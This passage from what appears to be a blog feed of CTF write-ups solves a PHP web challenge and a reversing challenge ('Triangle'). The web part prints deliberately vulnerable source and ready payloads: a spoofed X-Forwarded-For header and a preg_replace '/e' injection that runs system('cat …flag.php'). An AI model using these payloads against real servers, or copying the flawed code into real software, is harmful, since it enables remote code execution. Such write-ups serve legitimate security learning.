class="string">"webkit"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"X-UA-Compatible"</span> <span class="attr">content</span>=<span class="string">"IE=edge,chrome=1"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"viewport"</span> <span class="attr">content</span>=<span class="string">"width=device-width, initial-scale=1, maximum-scale=1"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">link</span> <span class="attr">rel</span>=<span class="string">"stylesheet"</span> <span class="attr">href</span>=<span class="string">"layui/css/layui.css"</span> <span class="attr">media</span>=<span class="string">"all"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">title</span>></span>设备维护ä¸å¿ƒ<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">ul</span> <span class="attr">class</span>=<span class="string">"layui-nav"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">li</span> <span class="attr">class</span>=<span class="string">"layui-nav-item layui-this"</span>></span><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">"?page=index"</span>></span>云平å�°è®¾å¤‡ç»´æŠ¤ä¸å¿ƒ<span class="tag"></<span class="name">a</span>></span><span class="tag"></<span class="name">li</span>></span></span><br><span 
class="line"> <span class="tag"></<span class="name">ul</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">fieldset</span> <span class="attr">class</span>=<span class="string">"layui-elem-field layui-field-title"</span> <span class="attr">style</span>=<span class="string">"margin-top: 30px;"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">legend</span>></span>设备列表<span class="tag"></<span class="name">legend</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">fieldset</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">table</span> <span class="attr">class</span>=<span class="string">"layui-hide"</span> <span class="attr">id</span>=<span class="string">"test"</span>></span><span class="tag"></<span class="name">table</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/html"</span> <span class="attr">id</span>=<span class="string">"switchTpl"</span>></span></span><br><span class="line"><span class="handlebars"><span class="xml"> <span class="comment"><!-- 这里的 checked 的状æ€�å�ªæ˜¯æ¼”示 --></span></span></span></span><br><span class="line"><span class="handlebars"><span class="xml"> <span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"checkbox"</span> <span class="attr">name</span>=<span class="string">"sex"</span> <span class="attr">value</span>=<span class="string">"</span></span></span><span class="template-variable">{{d.id}}</span><span class="xml"><span class="tag"><span class="string">"</span> <span class="attr">lay-skin</span>=<span class="string">"switch"</span> <span class="attr">lay-text</span>=<span class="string">"å¼€|å</span></span></span></span></span><br><span class="line"><span class="actionscript">³<span class="string">" lay-filter="</span>checkDemo<span class="string">" {{ 
d.id==1 0003 ? 'checked' : '' }}></span></span></span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"layui/layui.js"</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span></span><br><span class="line"><span class="actionscript"> layui.use(<span class="string">'table'</span>, <span class="function"><span class="keyword">function</span><span class="params">()</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> table = layui.table,</span></span><br><span class="line"> form = layui.form;</span><br><span class="line"></span><br><span class="line"> table.render({</span><br><span class="line"><span class="actionscript"> elem: <span class="string">'#test'</span>,</span></span><br><span class="line"><span class="actionscript"> url: <span class="string">'/somrthing.json'</span>,</span></span><br><span class="line"> cellMinWidth: 80,</span><br><span class="line"> cols: [</span><br><span class="line"> [</span><br><span class="line"><span class="actionscript"> { type: <span class="string">'numbers'</span> },</span></span><br><span class="line"><span class="actionscript"> { type: <span class="string">'checkbox'</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'id'</span>, title: <span class="string">'ID'</span>, width: <span class="number">100</span>, unresize: <span class="literal">true</span>, sort: <span class="literal">true</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'name'</span>, title: <span class="string">'设备å��'</span>, templet: <span 
class="string">'#nameTpl'</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'area'</span>, title: <span class="string">'区域'</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'status'</span>, title: <span class="string">'维护状态'</span>, minWidth: <span class="number">120</span>, sort: <span class="literal">true</span> },</span></span><br><span class="line"><span class="actionscript"> { field: <span class="string">'check'</span>, title: <span class="string">'设备开关'</span>, width: <span class="number">85</span>, templet: <span class="string">'#switchTpl'</span>, unresize: <span class="literal">true</span> }</span></span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"><span class="actionscript"> page: <span class="literal">true</span></span></span><br><span class="line"> });</span><br><span class="line"> });</span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span>></span></span><br><span class="line"><span class="actionscript"> layui.use(<span class="string">'element'</span>, <span class="function"><span class="keyword">function</span><span class="params">()</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> element = layui.element; <span class="comment">// nav hover effects, sub-menus and similar features depend on the element module</span></span></span><br><span class="line"><span class="actionscript"> <span class="comment">// listen for nav clicks</span></span></span><br><span class="line"><span class="actionscript"> element.on(<span class="string">'nav(demo)'</span>, <span class="function"><span class="keyword">function</span><span class="params">(elem)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="comment">//console.log(elem)</span></span></span><br><span class="line"> 
layer.msg(elem.text());</span><br><span class="line"> });</span><br><span class="line"> });</span><br><span class="line"> <span class="tag"></<span class="name">script</span>></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php">$page = $_GET[page];</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span> (<span class="keyword">isset</span>($page)) {</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span> (ctype_alnum($page)) {</span></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"text-align:center"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">class</span>=<span class="string">"lead"</span>></span><span class="php"><span class="meta"><?php</span> <span class="keyword">echo</span> $page; <span class="keyword">die</span>();<span class="meta">?></span></span><span class="tag"></<span class="name">p</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"></span><br><span class="line"><span 
class="php"><span class="meta"><?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php">}<span class="keyword">else</span>{</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"text-align:center"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">class</span>=<span class="string">"lead"</span>></span></span><br><span class="line"> <span class="php"><span class="meta"><?php</span></span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (strpos($page, <span class="string">'input'</span>) > <span class="number">0</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (strpos($page, <span class="string">'ta:text'</span>) > <span class="number">0</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (strpos($page, <span class="string">'text'</span>) > <span class="number">0</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> 
}</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> ($page === <span class="string">'index.php'</span>) {</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>(<span class="string">'Ok'</span>);</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"><span class="php"> <span class="keyword">include</span>($page);</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> <span class="meta">?></span></span></span><br><span class="line"> <span class="tag"></<span class="name">p</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span><span class="tag"><<span class="name">br</span> /></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"><span class="php">}}</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="comment">// convenient helper for input/output; this feature is still under development and only internal staff may test it</span></span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="keyword">if</span> ($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>] === <span class="string">'127.0.0.1'</span>) {</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">echo</span> <span class="string">"<br >Welcome My Admin ! 
<br >"</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="php"> $pattern = $_GET[pat];</span></span><br><span class="line"><span class="php"> $replacement = $_GET[rep];</span></span><br><span class="line"><span class="php"> $subject = $_GET[sub];</span></span><br><span class="line"></span><br><span class="line"><span class="php"> <span class="keyword">if</span> (<span class="keyword">isset</span>($pattern) && <span class="keyword">isset</span>($replacement) && <span class="keyword">isset</span>($subject)) {</span></span><br><span class="line"><span class="php"> preg_replace($pattern, $replacement, $subject);</span></span><br><span class="line"><span class="php"> }<span class="keyword">else</span>{</span></span><br><span class="line"><span class="php"> <span class="keyword">die</span>();</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"></span><br><span class="line"><span class="php">}</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></div><p>Here we find the dangerous function <strong>preg_replace()</strong>, which gives us a command execution vulnerability.</p><p>preg_replace(pattern, replacement, subject): when the pattern carries the /e modifier, preg_replace() executes the code in the replacement part as PHP (put simply, the replacement value is placed inside an eval() construct).</p><p>Payload: <code>/index.php?pat=/test/e&rep=phpinfo()&sub=test</code>. An XFF bypass is also needed here (see the source for why); this can be tested with Burp Suite's Repeater:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/JeRE8j7oHXBgvqP.png" alt="" title=""> </div> 
<div class="image-caption"></div> </figure><p>The final payload that gets the flag: <code>/index.php?pat=/test/e&rep=system('cat%20./s3chahahaDir/flag/flag.php')&sub=test</code>:</p><h2 id="Triangle"><a href="#Triangle" class="headerlink" title="Triangle"></a>Triangle</h2><p>After entering the challenge, first read through the JavaScript source. Its formatting is rather messy, so Chrome's built-in code formatter can be used to tidy it up:</p><p>util.js</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="JAVASCRIPT"><figure class="iseeu highlight /javascript"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test_pw</span>(<span class="params">e, _</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> t = stoh(atob(getBase64Image(<span class="string">"eye"</span>)))</span><br><span class="line"> , r = <span class="number">4096</span></span><br><span class="line"> , m = <span class="number">8192</span></span><br><span class="line"> , R = <span class="number">12288</span></span><br><span class="line"> , a = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R10, R),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R8, _.length),</span><br><span class="line"> a.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> o = <span class="number">0</span>; o < o1.length; o++)</span><br><span class="line"> a.mem_write(r + o, [t[o1[o]]]);</span><br><span class="line"> a.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(m, stoh(_)),</span><br><span class="line"> a.mem_map(R, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(R, stoh(e));</span><br><span class="line"> <span 
class="keyword">var</span> u = r</span><br><span class="line"> , c = r + o1.length;</span><br><span class="line"> <span class="keyword">return</span> a.emu_start(u, c, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> a.reg_read_i32(uc.ARM_REG_R5)</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">enc_pw</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> _ = stoh(atob(getBase64Image(<span class="string">"frei"</span>)))</span><br><span class="line"> , t = <span class="number">4096</span></span><br><span class="line"> , r = <span class="number">8192</span></span><br><span class="line"> , m = <span class="number">12288</span></span><br><span class="line"> , R = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R8, r),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R10, e.length),</span><br><span class="line"> R.mem_map(t, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> a = <span class="number">0</span>; a < o2.length; a++)</span><br><span class="line"> R.mem_write(t + a, [_[o2[a]]]);</span><br><span class="line"> R.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> R.mem_write(r, stoh(e)),</span><br><span class="line"> R.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">var</span> o = t</span><br><span class="line"> , u = t + o2.length;</span><br><span class="line"> <span class="keyword">return</span> R.emu_start(o, u, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> htos(R.mem_read(m, 
e.length))</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_pw</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> e = stoh(atob(getBase64Image(<span class="string">"templar"</span>))), _ = <span class="string">""</span>, t = <span class="number">0</span>; t < o3.length; t++)</span><br><span class="line"> _ += <span class="built_in">String</span>.fromCharCode(e[o3[t]]);</span><br><span class="line"> <span class="keyword">return</span> _</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>secret.js</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="JAVASCRIPT"><figure class="iseeu highlight /javascript"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test_pw</span>(<span class="params">e, _</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> t = stoh(atob(getBase64Image(<span class="string">"eye"</span>)))</span><br><span class="line"> , r = <span class="number">4096</span></span><br><span class="line"> , m = <span class="number">8192</span></span><br><span class="line"> , R = <span class="number">12288</span></span><br><span class="line"> , a = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R10, R),</span><br><span class="line"> a.reg_write_i32(uc.ARM_REG_R8, _.length),</span><br><span class="line"> a.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> o = <span class="number">0</span>; o < o1.length; 
o++)</span><br><span class="line"> a.mem_write(r + o, [t[o1[o]]]);</span><br><span class="line"> a.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(m, stoh(_)),</span><br><span class="line"> a.mem_map(R, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> a.mem_write(R, stoh(e));</span><br><span class="line"> <span class="keyword">var</span> u = r</span><br><span class="line"> , c = r + o1.length;</span><br><span class="line"> <span class="keyword">return</span> a.emu_start(u, c, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> a.reg_read_i32(uc.ARM_REG_R5)</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">enc_pw</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> _ = stoh(atob(getBase64Image(<span class="string">"frei"</span>)))</span><br><span class="line"> , t = <span class="number">4096</span></span><br><span class="line"> , r = <span class="number">8192</span></span><br><span class="line"> , m = <span class="number">12288</span></span><br><span class="line"> , R = <span class="keyword">new</span> uc.Unicorn(uc.ARCH_ARM,uc.MODE_ARM);</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R8, r),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R9, m),</span><br><span class="line"> R.reg_write_i32(uc.ARM_REG_R10, e.length),</span><br><span class="line"> R.mem_map(t, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> a = <span class="number">0</span>; a < o2.length; a++)</span><br><span class="line"> R.mem_write(t + a, [_[o2[a]]]);</span><br><span class="line"> R.mem_map(r, <span class="number">4096</span>, uc.PROT_ALL),</span><br><span class="line"> R.mem_write(r, stoh(e)),</span><br><span 
class="line"> R.mem_map(m, <span class="number">4096</span>, uc.PROT_ALL);</span><br><span class="line"> <span class="keyword">var</span> o = t</span><br><span class="line"> , u = t + o2.length;</span><br><span class="line"> <span class="keyword">return</span> R.emu_start(o, u, <span class="number">0</span>, <span class="number">0</span>),</span><br><span class="line"> htos(R.mem_read(m, e.length))</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_pw</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> e = stoh(atob(getBase64Image(<span class="string">"templar"</span>))), _ = <span class="string">""</span>, t = <span class="number">0</span>; t < o3.length; t++)</span><br><span class="line"> _ += <span class="built_in">String</span>.fromCharCode(e[o3[t]]);</span><br><span class="line"> <span class="keyword">return</span> _</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>unicorn.js is the source of a JavaScript framework; leave it aside for now.</p><p>Running <code>get_pw()</code> in the console gives this return value:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/ElFStwzKPhqWsmR.png" alt="image-20210106224107993" title=""> </div> <div class="image-caption">image-20210106224107993</div> </figure><p>Running enc_pw and test_pw gives these return values:</p><p>enc_pw: <code>\x08\x00\xa0\xe1\x09\x10\xa0\xe1\x0a\x20\xa0\xe1\x00\x30\xa0\xe3\x00\x50\xa0\xe3\x00\x40\xd0\xe5\x01\x00\x55\xe3\x01\x00\x00\x1a\x03\x60\x03\xe2\x06\x40\x84\xe0\x06\x40\x84\xe2\x01\x50\x04\xe2\x00\x40\xc1\xe5\x01\x00\x80\xe2\x01\x10\x81\xe2\x01\x30\x83\xe2\x02\x00\x53\xe1\xf2\xff\xff\xba\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x00\x30\xa0\xe3\x00\x40\xa0\xe3\x00\x50\xa0\xe3\x00\x60\xa0\xe3\x00\x70\xa0\xe3\x00\x90\xa0\xe3\x00\xa0\xa0\xe3</code></p><p>test_pw: 
<code>\x09\x00\xa0\xe1\x0a\x10\xa0\xe1\x08\x30\xa0\xe1\x00\x40\xa0\xe3\x00\x50\xa0\xe3\x00\xc0\xa0\xe3\x00\x20\xd0\xe5\x00\x60\xd1\xe5\x05\x60\x86\xe2\x01\xc0\x04\xe2\x00\x00\x5c\xe3\x00\x00\x00\x0a\x03\x60\x46\xe2\x06\x00\x52\xe1\x05\x00\x00\x1a\x01\x00\x80\xe2\x01\x10\x81\xe2\x01\x40\x84\xe2\x03\x00\x54\xe1\xf1\xff\xff\xba\x01\x50\xa0\xe3\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x00\x30\xa0\xe3\x00\x40\xa0\xe3\x00\x60\xa0\xe3\x00\x70\xa0\xe3\x00\x80\xa0\xe3\x00\x90\xa0\xe3\x00\xa0\xa0\xe3\x00\xc0\xa0\xe3</code></p><p>Converting this directly gives gibberish. After being stuck for a while I noticed that "ARM" appears in the JS source, and Unicorn.js also contains plenty of "ARM":</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/es9oQD3hEM4baT7.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>A Baidu search shows it is a type of CPU, and turns up a converter between hex and ARM code: <a href="https://links.jianshu.com/go?to=http%3A%2F%2Farmconverter.com%2Fhextoarm%2F" target="_blank" rel="noopener">http://armconverter.com/hextoarm/</a></p><p>Strip the leading \x from the hex strings obtained from test_pw and enc_pw and run them through the converter to get the following assembly code:</p><p>enc_pw:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">MOV R0, R8</span><br><span class="line">MOV R1, SB</span><br><span class="line">MOV R2, SL</span><br><span class="line">MOV R3, #0</span><br><span class="line">MOV R5, #0</span><br><span class="line">LDRB R4, [R0]</span><br><span class="line">CMP R5, #1</span><br><span class="line">BNE #0x28</span><br><span class="line">AND R6, R3, #3</span><br><span class="line">ADD R4, R4, R6</span><br><span class="line">ADD R4, R4, #6</span><br><span class="line">AND R5, R4, #1</span><br><span class="line">STRB R4, [R1]</span><br><span class="line">ADD R0, R0, #1</span><br><span class="line">ADD R1, R1, #1</span><br><span class="line">ADD R3, R3, #1</span><br><span class="line">CMP R3, 
R2</span><br><span class="line">BLT #0x14</span><br><span class="line">MOV R0, #0</span><br><span class="line">MOV R1, #0</span><br><span class="line">MOV R2, #0</span><br><span class="line">MOV R3, #0</span><br><span class="line">MOV R4, #0</span><br><span class="line">MOV R5, #0</span><br><span class="line">MOV R6, #0</span><br><span class="line">MOV R7, #0</span><br><span class="line">MOV SB, #0</span><br><span class="line">MOV SL, #0</span><br></pre></td></tr></table></figure></div><p>test_pw:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">MOV R0, SB</span><br><span class="line">MOV R1, SL</span><br><span class="line">MOV R3, R8</span><br><span class="line">MOV R4, #0</span><br><span class="line">MOV R5, #0</span><br><span class="line">MOV IP, #0</span><br><span class="line">LDRB R2, [R0]</span><br><span class="line">LDRB R6, [R1]</span><br><span class="line">ADD R6, R6, #5</span><br><span class="line">AND IP, R4, #1</span><br><span class="line">CMP IP, #0 </span><br><span class="line">BEQ #0x34</span><br><span class="line">SUB R6, R6, #3</span><br><span class="line">CMP R2, R6</span><br><span class="line">BNE #0x54</span><br><span class="line">ADD R0, R0, #1</span><br><span class="line">ADD R1, R1, #1</span><br><span class="line">ADD R4, R4, #1</span><br><span class="line">CMP R4, R3</span><br><span class="line">BLT #0x18</span><br><span class="line">MOV R5, #1</span><br><span class="line">MOV R0, #0</span><br><span class="line">MOV R1, #0</span><br><span class="line">MOV R2, #0</span><br><span class="line">MOV R3, #0</span><br><span class="line">MOV R4, #0</span><br><span class="line">MOV R6, #0</span><br><span class="line">MOV R7, #0</span><br><span class="line">MOV R8, #0</span><br><span class="line">MOV SB, #0</span><br><span class="line">MOV SL, #0</span><br><span 
class="line">MOV IP, #0</span><br></pre></td></tr></table></figure></div><p>As someone who knows no assembly at all, I was completely lost. Is mastering both Web and reverse engineering the way of the future???</p><p>This is really a reversing challenge. (Sort of.)</p><p>So I had to look up a writeup, which shows that the assembly above, written in Python, looks like this:</p><p>enc_pw:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc_pw</span><span class="params">(s)</span>:</span></span><br><span class="line">    res = <span class="string">''</span></span><br><span class="line">    f = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i, c <span class="keyword">in</span> enumerate(s):</span><br><span class="line">        c = ord(c)</span><br><span class="line">        <span class="keyword">if</span> f == <span class="number">1</span>:</span><br><span class="line">            c += i & <span class="number">3</span></span><br><span class="line">        c += <span class="number">6</span></span><br><span class="line">        f = c & <span class="number">1</span></span><br><span class="line">        res += chr(c)</span><br><span class="line">    <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><p>test_pw:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test_pw</span><span class="params">(s, t)</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i, (c, d) <span class="keyword">in</span> enumerate(zip(s, t)):</span><br><span class="line">        c, d = ord(c), ord(d)</span><br><span class="line">        c += <span class="number">5</span></span><br><span class="line">        <span class="keyword">if</span> i & <span class="number">1</span>:</span><br><span class="line">            c -= <span class="number">3</span></span><br><span class="line">        <span class="keyword">if</span> c != d:</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span></span><br></pre></td></tr></table></figure></div><p>Decryption script:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc_pw</span><span class="params">(s)</span>:</span></span><br><span class="line">    res = <span class="string">''</span></span><br><span class="line">    f = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i, c <span class="keyword">in</span> enumerate(s):</span><br><span class="line">        c = ord(c)</span><br><span class="line">        <span class="keyword">if</span> f == <span class="number">1</span>:</span><br><span class="line">            c += i & <span class="number">3</span></span><br><span class="line">        c += <span class="number">6</span></span><br><span class="line">        f = c & <span class="number">1</span></span><br><span class="line">        res += chr(c)</span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line">encrypted = <span class="string">'XYzaSAAX_PBssisodjsal_sSUVWZYYYb'</span></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i, c <span class="keyword">in</span> enumerate(encrypted):</span><br><span class="line">    c = ord(c)</span><br><span class="line">    c -= <span class="number">5</span></span><br><span class="line">    <span class="keyword">if</span> (i & <span class="number">1</span>) != <span class="number">0</span>:</span><br><span class="line">        c += <span class="number">3</span></span><br><span class="line">    <span class="keyword">for</span> d <span class="keyword">in</span> string.printable:</span><br><span class="line">        <span class="keyword">if</span> enc_pw(flag + d)[i] == chr(c):</span><br><span class="line">            flag += d</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="keyword">print</span>(flag)</span><br></pre></td></tr></table></figure></div><p>Run this script to get the flag</p>]]></content>
<summary type="html">
<p>Forced to do Web for the cybersecurity lab!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="Web" scheme="https://github.com/gha01un/gha01un.github.io/tags/Web/"/>
</entry>
<entry>
<title>XCTF - Huawei Track</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/06/[12.20]%20%E5%8D%8E%E4%B8%BA%E4%BA%91%E4%B8%93%E5%9C%BA/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/06/[12.20]%20%E5%8D%8E%E4%B8%BA%E4%BA%91%E4%B8%93%E5%9C%BA/</id>
<published>2021-01-06T13:51:14.710Z</published>
<updated>2021-01-11T02:06:21.130Z</updated>
